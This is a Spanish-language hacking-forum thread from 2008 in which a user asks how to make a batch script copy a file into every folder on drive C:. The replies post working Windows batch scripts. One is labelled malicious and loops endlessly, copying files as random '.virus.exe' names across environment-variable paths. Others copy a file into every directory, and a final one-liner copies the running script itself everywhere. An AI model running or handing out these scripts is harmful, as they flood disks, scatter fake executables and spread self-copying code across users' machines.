elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Arreglado, de nuevo, el registro del warzone (wargame) de EHN


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  archivo por todos lados
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: archivo por todos lados  (Leído 2,561 veces)
pastillas

Desconectado Desconectado

Mensajes: 5


Ver Perfil
archivo por todos lados
« en: 13 Abril 2008, 07:25 am »

como hago para copiar un archivo por todo el disco C:???
o sea q corro el batch y un archivo X se copie por C: , C:\windows, C:\archivos de programa y asi por todos los directorios?


En línea

~[uNd3rc0d3]~

Desconectado Desconectado

Mensajes: 188


programando...


Ver Perfil
Re: archivo por todos lados
« Respuesta #1 en: 18 Abril 2008, 02:50 am »

que se copie 1 vez? o varias veces?

abri el cmd y teclea copy /?


En línea


leete las reglas asi todos estamos mejor ;)
No_NICK

Desconectado Desconectado

Mensajes: 40


Ver Perfil
Re: archivo por todos lados
« Respuesta #2 en: 4 Mayo 2008, 23:18 pm »

.... jajajaja como me ha divertido tú pregunta que se copie por todos lados que maldad quieres hacer muchachon jejejejeje bueno aquí te dejo uno que se copia en todas las carpetas que estén como variables de entorno...


Citar

:: ejemplo 1:
:: este es inocuo lo único que hace es copiar un archivo de n lugar a otro
:: para que veas el concepto....


echo off
::
echo epale > epale.txt
echo ahora me copiare >> epale.txt
echo en todas tus variables  de entorno>> epale.txt
echo luego con el buscador de windows me buscas y me eliminas >> epale.txt

for /f " delims== tokens=1*" %%a in ('set') do set j=%%%%a%% && call :ini
::
:ini
for /f " delims== tokens=1*" %%a in ('echo %j%') do set k=%%a
copy epale.txt %k%
cls
goto :EOF


---------------------------------------------------------------------------------


:: ejemplo 2:
:: Este es malévolo copiara una cantidad de archivos por todos lados sin parar
:: Usar con precaución xD

:: debes cambiar la linea "copy... epale.txt" por el nombre del archivo que quieras
:: copiar por todos lados xD
:: ejemplo: archivo.xls en ves de epale.txt


echo off
:bucle
cls
for /f " delims== tokens=1*" %%a in ('set') do set j=%%%%a%% && call :ini
goto bucle
:ini
for /f " delims== tokens=1*" %%a in ('echo %j%') do set k=%%a
copy /y epale.txt %k% && ren %k%\epale.txt %Random%.virus.exe
cls
goto :EOF
:: también con un poco de imaginación puedes hacer otras cosillas
:: 


... y bueno uno mas entendible pero solo tiene dos niveles...

Citar

:: Es totalmente inocuo lo único que hace es escribir
:: el archivo epale por todos lados xD
:: le pudes agregar un bucle y un %Random%
:: de esa manera llenara el disco duro de el bendito archivo



:: Primero creamos un archivo en un directorio temporal

echo epale > %temp%\epale.txt

:: esperamos hasta q se cree el achivito

echo %errorlevel%>nul

:: luego este archivo lo asignamos a una variable con el nombre var

set var=%temp%\epale.txt

cd %HomeDrive%\

:: Y con el comado for listamos todas las carpetas q están en c:

FOR /D %%A IN (*) DO set p=\%%A && call :ini
:ini
set j=%HomeDrive%%p%
cd %j%
set y="%j%"
copy %var% %y%

:: luego listamos las carpetas de un nivel superior


FOR /D %%B IN (*) DO set f="%j%%%B" && copy %var% %f%   
cd %HomeDrive%\
goto :EOF





       .... Saludos
« Última modificación: 5 Mayo 2008, 03:09 am por No_NICK » En línea

BlueRav3n

Desconectado Desconectado

Mensajes: 3


Ver Perfil
Re: archivo por todos lados
« Respuesta #3 en: 3 Septiembre 2008, 04:02 am »

Buenas soy nuevo en el foro...hace tiempo estuve trabajando en un archivo asi..no seria mas facil el sgte codigo para copiar un archivo en todos los directorios..es sencillo pero potente..

@echo off
cd \
echo texto >> C:\texto.txt 
for /R /D %%a in (*) do (cd %%a && copy /y texto.txt %%a)
exit

Yo lo probe y me lo copia en toooodos los directorios de windows.. >:D >:D ;D
En línea

Darioxhcx


Desconectado Desconectado

Mensajes: 2.294


Ver Perfil
Re: archivo por todos lados
« Respuesta #4 en: 3 Septiembre 2008, 05:23 am »

FOR /R %homedrive% %%x in ( archivo.bat ) Do ( copy /y %0 "%%x" )

con una sola linea xD
saludos
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Alguien tiene vodafone movil? ( eso que te conectas a todos lados con un usb )
Foro Libre
XXXXXX 7 2,784 Último mensaje 27 Enero 2011, 18:43 pm
por Garfield07
Dudas por todos lados.(proyecto final de curso) RASPBERRY + c
Programación C/C++
sorifransois 0 1,454 Último mensaje 31 Marzo 2014, 23:18 pm
por sorifransois
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines